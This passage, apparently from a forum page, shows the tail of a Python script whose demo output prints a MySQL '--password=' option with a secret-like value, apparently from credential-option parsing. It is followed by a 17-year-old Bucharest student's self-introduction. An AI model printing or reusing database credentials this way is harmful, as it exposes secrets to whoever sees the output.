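if __name__ == "__main__":
    print(demo())  # {'options': ['--password=myRootSecretMysqlPass123'], 'refused_unreadable': True}
```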

  7. My name is Cătălin Marius, I am 17 years old and passionate about IT. I am at the Mate-Info (mathematics and computer science) high school in Bucharest, and I know a little of everything: SQL, Python, ASM, C++ (extremely little). I came here to learn from the best! :)
